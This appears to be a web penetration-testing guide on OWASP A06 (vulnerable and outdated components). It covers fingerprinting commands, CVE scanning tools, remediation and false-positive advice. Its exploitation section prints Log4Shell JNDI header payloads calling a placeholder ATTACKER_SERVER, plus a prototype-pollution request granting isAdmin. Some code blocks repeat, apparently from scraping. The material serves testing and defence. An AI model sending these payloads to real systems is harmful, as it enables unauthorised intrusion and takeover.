Exploitation A06| Vulnerable and Outdated Components
Vulnerable & Outdated Components
Vulnerable and outdated components (OWASP A06:2021) are a leading cause of web application compromise. Modern applications rely on hundreds of third-party libraries — a single vulnerable dependency can provide remote code execution, data exfiltration, or complete system takeover.
Danger
Known CVEs in popular components are actively exploited at scale by automated botnets.
Log4Shell (CVE-2021-44228) compromised thousands of organizations within hours of disclosure.
Fingerprinting Components
bash
# Detect JavaScript libraries from browser:
# Check page source and network requests for:
# jquery-3.6.0.min.js → jQuery 3.6.0
# angular.js → AngularJS (EOL!)
# react.production.min.js → React
# Automated fingerprinting:
# Wappalyzer (browser extension or CLI)
npx wappalyzer https://target.com
# WhatWeb:
whatweb https://target.com -v
# Check HTTP headers for version info:
curl -sI https://target.com | grep -iE 'server|x-powered|x-aspnet|x-generator'
# Server: Apache/2.4.49 → Known RCE (CVE-2021-41773)
# X-Powered-By: PHP/7.4.3
# Check for exposed package files:
curl -s https://target.com/package.json
curl -s https://target.com/composer.json
curl -s https://target.com/Gemfile
curl -s https://target.com/requirements.txt
curl -s https://target.com/pom.xml
# JavaScript source analysis:
curl -s https://target.com/js/app.js | grep -iE 'version|@license|Copyright'
# WordPress plugin enumeration:
wpscan --url https://target.com --enumerate p,t --api-token YOUR_TOKEN
# Nuclei technology detection:
nuclei -u https://target.com -t technologies/# Detect JavaScript libraries from browser:
# Check page source and network requests for:
# jquery-3.6.0.min.js → jQuery 3.6.0
# angular.js → AngularJS (EOL!)
# react.production.min.js → React
# Automated fingerprinting:
# Wappalyzer (browser extension or CLI)
npx wappalyzer https://target.com
# WhatWeb:
whatweb https://target.com -v
# Check HTTP headers for version info:
curl -sI https://target.com | grep -iE 'server|x-powered|x-aspnet|x-generator'
# Server: Apache/2.4.49 → Known RCE (CVE-2021-41773)
# X-Powered-By: PHP/7.4.3
# Check for exposed package files:
curl -s https://target.com/package.json
curl -s https://target.com/composer.json
curl -s https://target.com/Gemfile
curl -s https://target.com/requirements.txt
curl -s https://target.com/pom.xml
# JavaScript source analysis:
curl -s https://target.com/js/app.js | grep -iE 'version|@license|Copyright'
# WordPress plugin enumeration:
wpscan --url https://target.com --enumerate p,t --api-token YOUR_TOKEN
# Nuclei technology detection:
nuclei -u https://target.com -t technologies/Vulnerability Lookup
bash
# After identifying components and versions, look up CVEs:
# National Vulnerability Database:
# https://nvd.nist.gov/vuln/search
# Snyk Vulnerability Database:
# https://snyk.io/vuln/
# GitHub Advisory Database:
# https://github.com/advisories
# Retire.js (JavaScript-specific):
npx retire --js --path ./target-js-files/
# Or use the browser extension
# NPM audit (if package-lock.json available):
npm audit --json
# OWASP Dependency-Check:
dependency-check --project "target" --scan ./target-files/
# Trivy (container and filesystem scanning):
trivy fs ./target-source/
trivy image target-docker-image:latest
# Grype (SBOM-based vulnerability scanner):
grype dir:./target-source/
# Nuclei CVE scanning:
nuclei -u https://target.com -t cves/ -severity critical,high# After identifying components and versions, look up CVEs:
# National Vulnerability Database:
# https://nvd.nist.gov/vuln/search
# Snyk Vulnerability Database:
# https://snyk.io/vuln/
# GitHub Advisory Database:
# https://github.com/advisories
# Retire.js (JavaScript-specific):
npx retire --js --path ./target-js-files/
# Or use the browser extension
# NPM audit (if package-lock.json available):
npm audit --json
# OWASP Dependency-Check:
dependency-check --project "target" --scan ./target-files/
# Trivy (container and filesystem scanning):
trivy fs ./target-source/
trivy image target-docker-image:latest
# Grype (SBOM-based vulnerability scanner):
grype dir:./target-source/
# Nuclei CVE scanning:
nuclei -u https://target.com -t cves/ -severity critical,highHigh-Impact Historical CVEs
Critical CVEs to Always Check
Log4Shell (CVE-2021-44228): Apache Log4j 2.x RCE via JNDI lookup — CVSS 10.0
Spring4Shell (CVE-2022-22965): Spring Framework RCE via data binding — CVSS 9.8
Apache Struts (CVE-2017-5638): RCE via Content-Type header (Equifax breach)
jQuery <3.5.0 (CVE-2020-11022): XSS via HTML parsing in .html() method
Apache Path Traversal (CVE-2021-41773): Apache 2.4.49 path traversal + RCE
MOVEit (CVE-2023-34362): SQL injection → RCE in file transfer application
Prototype Pollution: Multiple NPM packages — lodash, minimist, qs
Exploitation Workflow
bash
# Example: Exploiting Log4Shell
# Step 1: Identify Java application (check headers, error pages)
# Step 2: Inject JNDI payload in various input points:
# Headers to test:
curl -H 'User-Agent: ${jndi:ldap://ATTACKER_SERVER/a}' https://target.com/
curl -H 'X-Forwarded-For: ${jndi:ldap://ATTACKER_SERVER/a}' https://target.com/
curl -H 'Referer: ${jndi:ldap://ATTACKER_SERVER/a}' https://target.com/
# Check for callback on your server:
# Set up listener: python3 -m http.server 8888
# Or use Burp Collaborator / interact.sh
# Example: Exploiting outdated WordPress plugin
# Step 1: wpscan identifies vulnerable plugin:
# "Contact Form 7 < 5.3.2 - Unrestricted File Upload"
# Step 2: Search for exploit:
searchsploit "contact form 7"
# Step 3: Use Metasploit or manual exploitation
# Example: Prototype pollution in Express.js
# If lodash < 4.17.12 is used:
curl -X POST https://target.com/api/merge \
-H 'Content-Type: application/json' \
-d '{"__proto__": {"isAdmin": true}}'# Example: Exploiting Log4Shell
# Step 1: Identify Java application (check headers, error pages)
# Step 2: Inject JNDI payload in various input points:
# Headers to test:
curl -H 'User-Agent: ${jndi:ldap://ATTACKER_SERVER/a}' https://target.com/
curl -H 'X-Forwarded-For: ${jndi:ldap://ATTACKER_SERVER/a}' https://target.com/
curl -H 'Referer: ${jndi:ldap://ATTACKER_SERVER/a}' https://target.com/
# Check for callback on your server:
# Set up listener: python3 -m http.server 8888
# Or use Burp Collaborator / interact.sh
# Example: Exploiting outdated WordPress plugin
# Step 1: wpscan identifies vulnerable plugin:
# "Contact Form 7 < 5.3.2 - Unrestricted File Upload"
# Step 2: Search for exploit:
searchsploit "contact form 7"
# Step 3: Use Metasploit or manual exploitation
# Example: Prototype pollution in Express.js
# If lodash < 4.17.12 is used:
curl -X POST https://target.com/api/merge \
-H 'Content-Type: application/json' \
-d '{"__proto__": {"isAdmin": true}}'Testing Checklist
- 1. Fingerprint web server, framework, and CMS versions
- 2. Identify JavaScript libraries and their versions (source code, Wappalyzer)
- 3. Check for exposed package manifests (package.json, composer.json, etc.)
- 4. Run Retire.js against client-side JavaScript
- 5. Run Nuclei CVE templates against the target
- 6. Look up identified versions in NVD, Snyk, and GitHub advisories
- 7. Test for high-profile CVEs (Log4Shell, Spring4Shell, etc.)
- 8. Check for EOL software that no longer receives security patches
Evidence Collection
Component Inventory: Table of component name, detected version, latest version, known CVEs
CVE References: Link to NVD/advisory with CVSS score for each finding
Exploitation Proof: If exploited, include request/response demonstrating impact
CVSS Range: Depends on underlying CVE — typically 5.0–10.0 for critical RCE vulnerabilities
Remediation
- Maintain SBOM: Create and maintain a Software Bill of Materials for all dependencies.
- Automated scanning: Integrate Dependabot, Snyk, or Renovate into CI/CD pipeline.
- Regular updates: Establish a patch cycle — critical CVEs within 24–48 hours, high within 1 week.
- Remove unused dependencies: Audit and remove packages no longer in use.
- Virtual patching: Use WAF rules to mitigate known CVEs while patches are being deployed.
- Pin versions: Use lock files (package-lock.json, Gemfile.lock) and verify integrity hashes.
False Positive Identification
- CVE without reachable code path: A vulnerable library version doesn't mean the vulnerability is exploitable — verify the vulnerable function/method is actually invoked by the application.
- Backported patches: Linux distributions often backport security fixes without changing the version number (e.g., Apache 2.4.6-97.el7 may include fixes from 2.4.54) — check distribution changelogs.
- Dev/test dependencies: Vulnerabilities in devDependencies that never ship to production are typically informational unless they affect the build pipeline.